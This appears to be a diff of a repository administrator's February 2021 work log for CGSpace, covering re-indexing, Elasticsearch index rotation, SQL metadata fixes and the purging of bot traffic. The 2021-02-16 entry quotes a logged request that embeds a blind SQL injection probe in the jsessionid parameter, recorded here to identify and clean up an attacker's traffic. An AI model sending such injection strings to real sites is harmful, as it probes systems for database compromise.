                                                                                                  $ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -t 'correct' -m 43
                                                                                                  -
                                                                                                    +
                                                                                                    $ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -t 'correct' -m 43
                                                                                                    +
                                                                                                    • Help Peter debug an issue with one of Alan Duncan’s new FEAST Data reports on CGSpace
                                                                                                      • For some reason the default policy for the item was “COLLECTION_492_DEFAULT_READ” group, which had zero members
                                                                                                      • @@ -372,12 +372,12 @@ $ dspace oai import -c
                                                                                                      • Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server
                                                                                                      • After the server came back up I started a full Discovery re-indexing:
                                                                                                      -
                                                                                                      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                      -
                                                                                                      -real    247m30.850s
                                                                                                      -user    160m36.657s
                                                                                                      -sys     2m26.050s
                                                                                                      -
                                                                                                        +
                                                                                                        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                        +
                                                                                                        +real    247m30.850s
                                                                                                        +user    160m36.657s
                                                                                                        +sys     2m26.050s
                                                                                                        +
                                                                                                        • Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN
                                                                                                          • He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform
                                                                                                          • @@ -385,30 +385,30 @@ sys 2m26.050s
                                                                                                          • Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:
                                                                                                          -
                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          -# start indexing in AReS
                                                                                                          -

                                                                                                          2021-02-08

                                                                                                          +
                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          +# start indexing in AReS
                                                                                                          +

                                                                                                          2021-02-08

                                                                                                          • Finish rotating the AReS indexes after the harvesting last night:
                                                                                                          -
                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                          -{
                                                                                                          -  "count" : 100983,
                                                                                                          -  "_shards" : {
                                                                                                          -    "total" : 1,
                                                                                                          -    "successful" : 1,
                                                                                                          -    "skipped" : 0,
                                                                                                          -    "failed" : 0
                                                                                                          -  }
                                                                                                          -}
                                                                                                          -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
                                                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-08'
                                                                                                          -

                                                                                                          2021-02-10

                                                                                                          +
                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                          +{
                                                                                                          +  "count" : 100983,
                                                                                                          +  "_shards" : {
                                                                                                          +    "total" : 1,
                                                                                                          +    "successful" : 1,
                                                                                                          +    "skipped" : 0,
                                                                                                          +    "failed" : 0
                                                                                                          +  }
                                                                                                          +}
                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-08'
                                                                                                          +

                                                                                                          2021-02-10

                                                                                                          • Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV
                                                                                                              @@ -429,22 +429,22 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                                          -
                                                                                                          $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | wc -l
                                                                                                          -30354
                                                                                                          -$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort -u | wc -l
                                                                                                          -18555
                                                                                                          -$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -c | sort -h | tail
                                                                                                          -      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
                                                                                                          -      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
                                                                                                          -      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
                                                                                                          -      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
                                                                                                          -      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
                                                                                                          -      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
                                                                                                          -      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
                                                                                                          -      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
                                                                                                          -      6 ff42d1e6-c489-492c-a40a-803cabd901ed
                                                                                                          -      7 094e9e1d-09ff-40ca-a6b9-eca580936147
                                                                                                          -
                                                                                                            +
                                                                                                            $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | wc -l
                                                                                                            +30354
                                                                                                            +$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort -u | wc -l
                                                                                                            +18555
                                                                                                            +$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -c | sort -h | tail
                                                                                                            +      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
                                                                                                            +      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
                                                                                                            +      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
                                                                                                            +      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
                                                                                                            +      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
                                                                                                            +      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
                                                                                                            +      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
                                                                                                            +      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
                                                                                                            +      6 ff42d1e6-c489-492c-a40a-803cabd901ed
                                                                                                            +      7 094e9e1d-09ff-40ca-a6b9-eca580936147
                                                                                                            +
                                                                                                            • I added a comment to that bug to ask if this is a side effect of the patch
                                                                                                            • I started working on tagging pre-2010 ILRI items with license information, like we talked about with Peter and Abenet last week
                                                                                                                @@ -452,23 +452,23 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1
                                                                                                            -
                                                                                                            $ csvcut -c 'id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]' /tmp/2021-02-10-ILRI.csv | csvgrep -c 'dc.type[en_US]' -r '^.+[^(Journal Item|Journal Article|Book|Book Chapter)]'
                                                                                                            -
                                                                                                              +
                                                                                                              $ csvcut -c 'id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]' /tmp/2021-02-10-ILRI.csv | csvgrep -c 'dc.type[en_US]' -r '^.+[^(Journal Item|Journal Article|Book|Book Chapter)]'
                                                                                                              +
                                                                                                              • I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:
                                                                                                              -
                                                                                                              if(diff(value,"01/01/2010".toDate(),"days")<0, true, false)
                                                                                                              -
                                                                                                                +
                                                                                                                if(diff(value,"01/01/2010".toDate(),"days")<0, true, false)
                                                                                                                +
                                                                                                                • Then I filtered by publisher to make sure they were only ours:
                                                                                                                -
                                                                                                                or(
                                                                                                                -  value.contains("International Livestock Research Institute"),
                                                                                                                -  value.contains("ILRI"),
                                                                                                                -  value.contains("International Livestock Centre for Africa"),
                                                                                                                -  value.contains("ILCA"),
                                                                                                                -  value.contains("ILRAD"),
                                                                                                                -  value.contains("International Laboratory for Research on Animal Diseases")
                                                                                                                -)
                                                                                                                -
                                                                                                                  +
                                                                                                                  or(
                                                                                                                  +  value.contains("International Livestock Research Institute"),
                                                                                                                  +  value.contains("ILRI"),
                                                                                                                  +  value.contains("International Livestock Centre for Africa"),
                                                                                                                  +  value.contains("ILCA"),
                                                                                                                  +  value.contains("ILRAD"),
                                                                                                                  +  value.contains("International Laboratory for Research on Animal Diseases")
                                                                                                                  +)
                                                                                                                  +
                                                                                                                  • I tagged these pre-2010 items with “Other” if they didn’t already have a license
                                                                                                                  • I checked 2010 to 2015, and 2016 to date, but they were all tagged already!
                                                                                                                  • In the end I added the “Other” license to 1,523 items from before 2010
                                                                                                                  • @@ -496,7 +496,7 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1 en | 7601 | 0 (4 rows) -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item); +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
                                                                    • Start a full Discovery re-indexing on CGSpace
                                                                    @@ -504,8 +504,8 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
                                                                    • Clear the OpenRXV temp items index:
                                                                    -
                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                    -
                                                                      +
                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                      +
                                                                      • Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard
                                                                      • Peter asked me about a few other recently submitted FEAST items that are restricted
                                                                          @@ -521,35 +521,35 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
                                                                      -
                                                                      $ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p 'fuuu' -f 43 -t 55
                                                                      -

                                                                      2021-02-15

                                                                      +
                                                                      $ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p 'fuuu' -f 43 -t 55
                                                                      +

                                                                      2021-02-15

                                                                      • Check the results of the AReS Harvesting from last night:
                                                                      -
                                                                      $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                      -{
                                                                      -  "count" : 101126,
                                                                      -  "_shards" : {
                                                                      -    "total" : 1,
                                                                      -    "successful" : 1,
                                                                      -    "skipped" : 0,
                                                                      -    "failed" : 0
                                                                      -  }
                                                                      -}
                                                                      -
                                                                        +
                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                        +{
                                                                        +  "count" : 101126,
                                                                        +  "_shards" : {
                                                                        +    "total" : 1,
                                                                        +    "successful" : 1,
                                                                        +    "skipped" : 0,
                                                                        +    "failed" : 0
                                                                        +  }
                                                                        +}
                                                                        +
                                                                        • Set the current items index to read only and make a backup:
                                                                        -
                                                                        $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
                                                                        -
                                                                          +
                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
                                                                          +
                                                                          • Delete the current items index and clone the temp one:
                                                                          -
                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-15'
                                                                          -
                                                                            +
                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                            +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-15'
                                                                            +
                                                                            • Call with Abdullah from CodeObia to discuss community and collection statistics reporting

                                                                            2021-02-16

                                                                            @@ -563,49 +563,49 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                          • They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:
                                                                          -
                                                                          $ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203' | sort | uniq | wc -l
                                                                          -4007
                                                                          -$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231' | sort | uniq | wc -l
                                                                          -2128
                                                                          -
                                                                            +
                                                                            $ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203' | sort | uniq | wc -l
                                                                            +4007
                                                                            +$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231' | sort | uniq | wc -l
                                                                            +2128
                                                                            +
                                                                            • Ah, actually 45.146.165.203 is making requests like this:
                                                                            -
                                                                            "http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%' AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND 'XzQO%'='XzQO"
                                                                            -
                                                                              +
                                                                              "http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%' AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND 'XzQO%'='XzQO"
                                                                              +
                                                                              • I purged the hits from these two using my check-spider-ip-hits.sh:
                                                                              -
                                                                              $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                              -Purging 4005 hits from 45.146.165.203 in statistics
                                                                              -Purging 3493 hits from 130.255.161.231 in statistics
                                                                              -
                                                                              -Total number of bot hits purged: 7498
                                                                              -
                                                                                +
                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                +Purging 4005 hits from 45.146.165.203 in statistics
                                                                                +Purging 3493 hits from 130.255.161.231 in statistics
                                                                                +
                                                                                +Total number of bot hits purged: 7498
                                                                                +
                                                                                • Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:
                                                                                -
                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                -Purging 27163 hits from 45.146.164.176 in statistics
                                                                                -Purging 19556 hits from 45.146.165.105 in statistics
                                                                                -Purging 15927 hits from 45.146.165.83 in statistics
                                                                                -Purging 8085 hits from 45.146.165.104 in statistics
                                                                                -
                                                                                -Total number of bot hits purged: 70731
                                                                                -
                                                                                  +
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  +Purging 27163 hits from 45.146.164.176 in statistics
                                                                                  +Purging 19556 hits from 45.146.165.105 in statistics
                                                                                  +Purging 15927 hits from 45.146.165.83 in statistics
                                                                                  +Purging 8085 hits from 45.146.165.104 in statistics
                                                                                  +
                                                                                  +Total number of bot hits purged: 70731
                                                                                  +
                                                                                  • My god, and 64.39.99.15 is from Qualys, the domain scanning security people, who are making queries trying to see if we are vulnerable or something (wtf?)
                                                                                    • Looking in Solr I see a few different IPs with DNS like sn003.s02.iad01.qualys.com. so I will purge their requests too:
                                                                                  -
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  -Purging 3 hits from 130.255.161.231 in statistics
                                                                                  -Purging 16773 hits from 64.39.99.15 in statistics
                                                                                  -Purging 6976 hits from 64.39.99.13 in statistics
                                                                                  -Purging 13 hits from 64.39.99.63 in statistics
                                                                                  -Purging 12 hits from 64.39.99.65 in statistics
                                                                                  -Purging 12 hits from 64.39.99.94 in statistics
                                                                                  -
                                                                                  -Total number of bot hits purged: 23789
                                                                                  -

                                                                                  2021-02-17

                                                                                  +
                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                  +Purging 3 hits from 130.255.161.231 in statistics
                                                                                  +Purging 16773 hits from 64.39.99.15 in statistics
                                                                                  +Purging 6976 hits from 64.39.99.13 in statistics
                                                                                  +Purging 13 hits from 64.39.99.63 in statistics
                                                                                  +Purging 12 hits from 64.39.99.65 in statistics
                                                                                  +Purging 12 hits from 64.39.99.94 in statistics
                                                                                  +
                                                                                  +Total number of bot hits purged: 23789
                                                                                  +

                                                                                  2021-02-17

                                                                                  • I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprising
                                                                                      @@ -627,11 +627,11 @@ Purging 12 hits from 64.39.99.94 in statistics
                                                                                    • Abenet asked me to add Tom Randolph’s ORCID identifier to CGSpace
                                                                                    • I also tagged all his 247 existing items on CGSpace:
                                                                                    -
                                                                                    $ cat 2021-02-17-add-tom-orcid.csv 
                                                                                    -dc.contributor.author,cg.creator.id
                                                                                    -"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                    -

                                                                                    2021-02-20

                                                                                    +
                                                                                    $ cat 2021-02-17-add-tom-orcid.csv 
                                                                                    +dc.contributor.author,cg.creator.id
                                                                                    +"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                    +

                                                                                    2021-02-20

                                                                                    • Test the CG Core v2 migration on DSpace Test (linode26) one last time
                                                                                    @@ -640,17 +640,17 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace
                                                                                  • Start the CG Core v2 migration on CGSpace (linode18)
                                                                                  • After deploying the latest 6_x-prod branch and running migrate-fields.sh I started a full Discovery reindex:
                                                                                  -
                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                  -
                                                                                  -real    311m12.617s
                                                                                  -user    217m3.102s
                                                                                  -sys     2m37.363s
                                                                                  -
                                                                                    +
                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                    +
                                                                                    +real    311m12.617s
                                                                                    +user    217m3.102s
                                                                                    +sys     2m37.363s
                                                                                    +
                                                                                    • Then update OAI:
                                                                                    -
                                                                                    $ dspace oai import -c
                                                                                    -$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                    -
                                                                                      +
                                                                                      $ dspace oai import -c
                                                                                      +$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                      +
                                                                                      • Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet
                                                                                        • I told him he can try to use something like this if it’s just something like the ILRI articles in journals collection:
                                                                                        • @@ -668,16 +668,16 @@ $ export JAVA_OPTS=
                                                                                          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
                                                                                          -$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                          -
                                                                                            +
                                                                                            $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
                                                                                            +$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                            +
                                                                                            • The process took an hour or so!
                                                                                            • I added colorized output to the csv-metadata-quality tool and tagged version 0.4.4 on GitHub
                                                                                            • I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:
                                                                                            -
                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                            -# start indexing in AReS
                                                                                            -

                                                                                            2021-02-22

                                                                                            +
                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                            +# start indexing in AReS
                                                                                            +

                                                                                            2021-02-22

                                                                                            • Start looking at splitting the series name and number in dcterms.isPartOf now that we have migrated to CG Core v2
                                                                                                @@ -687,43 +687,43 @@ $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
                                                                                            -
                                                                                            localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                            -UPDATE 104
                                                                                            -
                                                                                              +
                                                                                              localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                              +UPDATE 104
                                                                                              +
                                                                                              • As for splitting the other values, I think I can export the dspace_object_id and text_value and then upload it as a CSV rather than writing a Python script to create the new metadata values

                                                                                              2021-02-22

                                                                                              • Check the results of the AReS harvesting from last night:
                                                                                              -
                                                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                              -{
                                                                                              -  "count" : 101380,
                                                                                              -  "_shards" : {
                                                                                              -    "total" : 1,
                                                                                              -    "successful" : 1,
                                                                                              -    "skipped" : 0,
                                                                                              -    "failed" : 0
                                                                                              -  }
                                                                                              -}
                                                                                              -
                                                                                                +
                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                +{
                                                                                                +  "count" : 101380,
                                                                                                +  "_shards" : {
                                                                                                +    "total" : 1,
                                                                                                +    "successful" : 1,
                                                                                                +    "skipped" : 0,
                                                                                                +    "failed" : 0
                                                                                                +  }
                                                                                                +}
                                                                                                +
                                                                                                • Set the current items index to read only and make a backup:
                                                                                                -
                                                                                                $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
                                                                                                -
                                                                                                  +
                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
                                                                                                  +
                                                                                                  • Delete the current items index and clone the temp one to it:
                                                                                                  -
                                                                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                  -
                                                                                                    +
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                    +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                    +
                                                                                                    • Then delete the temp and backup:
                                                                                                    -
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                    -{"acknowledged":true}%
                                                                                                    -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-22'
                                                                                                    -

                                                                                                    2021-02-23

                                                                                                    +
                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                    +{"acknowledged":true}%
                                                                                                    +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-22'
                                                                                                    +

                                                                                                    2021-02-23

                                                                                                    • CodeObia sent a pull request for clickable countries on AReS
                                                                                                        @@ -732,22 +732,22 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                                      • Remove semicolons from series names without numbers:
                                                                                                      -
                                                                                                      dspace=# BEGIN;
                                                                                                      -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                                      -UPDATE 104
                                                                                                      -dspace=# COMMIT;
                                                                                                      -
                                                                                                        +
                                                                                                        dspace=# BEGIN;
                                                                                                        +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '^(.+?);$','\1', 'g') WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ ';$';
                                                                                                        +UPDATE 104
                                                                                                        +dspace=# COMMIT;
                                                                                                        +
                                                                                                        • Set all text_lang values on CGSpace to en_US to make the series replacements easier (this didn’t work, read below):
                                                                                                        -
                                                                                                        dspace=# BEGIN;
                                                                                                        -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE text_lang !='en_US' AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                        -UPDATE 911
                                                                                                        -cgspace=# COMMIT;
                                                                                                        -
                                                                                                          +
                                                                                                          dspace=# BEGIN;
                                                                                                          +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE text_lang !='en_US' AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                          +UPDATE 911
                                                                                                          +cgspace=# COMMIT;
                                                                                                          +
                                                                                                          • Then export all series with their IDs to CSV:
                                                                                                          -
                                                                                                          dspace=# \COPY (SELECT dspace_object_id, text_value as "dcterms.isPartOf[en_US]" FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
                                                                                                          -
                                                                                                            +
                                                                                                            dspace=# \COPY (SELECT dspace_object_id, text_value as "dcterms.isPartOf[en_US]" FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
                                                                                                            +
                                                                                                            • In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check
                                                                                                              • For example many Spore items are like “Spore, Spore 23”
                                                                                                              • @@ -761,23 +761,23 @@ cgspace=# COMMIT;
                                                                                                            -
                                                                                                            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_value_id=5355845;
                                                                                                            -UPDATE 1
                                                                                                            -
                                                                                                              +
                                                                                                              dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_value_id=5355845;
                                                                                                              +UPDATE 1
                                                                                                              +
                                                                                                              • This also seems to work, using the id for just that one item:
                                                                                                              -
                                                                                                              dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id='9840d19b-a6ae-4352-a087-6d74d2629322';
                                                                                                              -UPDATE 37
                                                                                                              -
                                                                                                                +
                                                                                                                dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id='9840d19b-a6ae-4352-a087-6d74d2629322';
                                                                                                                +UPDATE 37
                                                                                                                +
                                                                                                                • This seems to work better for some reason:
                                                                                                                -
                                                                                                                dspacetest=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                                -UPDATE 18659
                                                                                                                -
                                                                                                                  +
                                                                                                                  dspacetest=# UPDATE metadatavalue SET text_lang='en_US' WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
                                                                                                                  +UPDATE 18659
                                                                                                                  +
                                                                                                                  • I split the CSV file in batches of 5,000 using xsv, then imported them one by one in CGSpace:
                                                                                                                  -
                                                                                                                  $ dspace metadata-import -f /tmp/0.csv
                                                                                                                  -
                                                                                                                    +
                                                                                                                    $ dspace metadata-import -f /tmp/0.csv
                                                                                                                    +
                                                                                                                    • It took FOREVER to import each file… like several hours each. MY GOD DSpace 6 is slow.
                                                                                                                    • Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros
                                                                                                                        @@ -785,40 +785,40 @@ UPDATE 18659
                                                                                                                    -
